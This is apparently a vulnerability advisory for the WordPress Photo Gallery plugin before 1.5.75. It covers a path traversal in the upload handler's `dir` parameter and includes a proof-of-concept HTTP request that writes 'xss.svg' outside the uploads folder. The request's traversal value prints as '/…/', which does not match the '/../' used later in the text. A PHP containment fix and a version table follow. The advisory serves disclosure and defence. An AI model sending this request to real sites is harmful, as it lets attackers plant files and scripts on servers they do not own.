The plugin did not ensure that uploaded files are kept inside its own uploads folder, so a high-privilege user could write images/SVG files anywhere in the filesystem the web server can write to, via a path traversal vector in the `dir` parameter.
The request below writes the xss.svg file into the /wp-content/uploads/ folder rather than /wp-content/uploads/photo-gallery/:

```http
POST /wp-admin/admin-ajax.php?bwg_nonce=4ef81877b0&action=bwg_UploadHandler&dir=/…/ HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------61502566032120876251044562165
Content-Length: 1841
Connection: close
Cookie: [high privilege user, such as admin]

-----------------------------61502566032120876251044562165
Content-Disposition: form-data; name="bwg_nonce"

d0b8d99404
-----------------------------61502566032120876251044562165
Content-Disposition: form-data; name="upload_thumb_width"

500
-----------------------------61502566032120876251044562165
Content-Disposition: form-data; name="upload_thumb_height"

500
-----------------------------61502566032120876251044562165
Content-Disposition: form-data; name="upload_img_width"

1200
-----------------------------61502566032120876251044562165
Content-Disposition: form-data; name="upload_img_height"

1200
-----------------------------61502566032120876251044562165
Content-Disposition: form-data; name="extensions"

jpg,jpeg,png,gif,svg
-----------------------------61502566032120876251044562165
Content-Disposition: form-data; name="callback"

bwg_add_image
-----------------------------61502566032120876251044562165
Content-Disposition: form-data; name="sort_by"

date_modified
-----------------------------61502566032120876251044562165
Content-Disposition: form-data; name="sort_order"

desc
-----------------------------61502566032120876251044562165
Content-Disposition: form-data; name="items_view"

thumbs
-----------------------------61502566032120876251044562165
Content-Disposition: form-data; name="files[]"; filename="xss.svg"
Content-Type: image/svg+xml

-----------------------------61502566032120876251044562165--
```
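The fix the advisory implies is a containment check: whatever the caller passes as `dir`, the resolved target directory must stay inside the plugin's uploads folder. The following is an added example written for this page, not code from the Photo Gallery plugin; the function name `bwg_example_resolve_upload_dir` and the `$uploads_base` argument are assumptions (in WordPress the base would normally be derived from `wp_upload_dir()['basedir']` plus the plugin's subfolder).

```php
<?php
// Added example (not the plugin's code): confine a caller-supplied "dir"
// parameter to the plugin's uploads folder before any file is written.
//
// $uploads_base  absolute path of the plugin's upload root, e.g.
//                wp-content/uploads/photo-gallery (an assumed value)
// $requested_dir the raw "dir" value from the request
//
// Returns the canonical target directory, or null if the request must be
// refused (traversal, NUL byte, or a directory that does not exist).
function bwg_example_resolve_upload_dir(string $uploads_base, string $requested_dir): ?string
{
    // Canonicalise the base once. realpath() resolves symlinks and "..",
    // and returns false if the directory does not exist.
    $base = realpath($uploads_base);
    if ($base === false) {
        return null;
    }

    // A NUL byte would truncate the path in the underlying C calls; refuse it
    // outright rather than letting realpath() interpret a shortened path.
    if (strpos($requested_dir, "\0") !== false) {
        return null;
    }

    // Build the candidate relative to the base (a leading slash must not be
    // allowed to turn the value into an absolute path) and canonicalise it.
    $relative  = ltrim($requested_dir, '/\\');
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $relative);
    if ($candidate === false) {
        // Target does not exist. Do not create it from untrusted input here;
        // creation, if needed, should happen only after the same check passes.
        return null;
    }

    // Containment check: the resolved path is either the base itself or lies
    // beneath it. The trailing separator in the prefix comparison stops a
    // sibling such as ".../photo-gallery2" from passing as a child of
    // ".../photo-gallery".
    if ($candidate !== $base && strpos($candidate, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }

    return $candidate;
}
```

With this in place a `dir` of `/../` resolves to the parent of the uploads root, fails the prefix comparison, and the handler refuses the upload instead of writing into /wp-content/uploads/. The comparison is done on `realpath()` output rather than on the raw string, so encoded or symlink-based variants of `..` are caught as well; string filtering of `..` alone is not sufficient. The uploaded file name itself (`xss.svg` in the request above) still needs the usual `basename()` treatment and extension checks, which this example does not cover.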
| CPE | Name | Operator | Version |
|---|---|---|---|
| | photo-gallery | lt | 1.5.75 |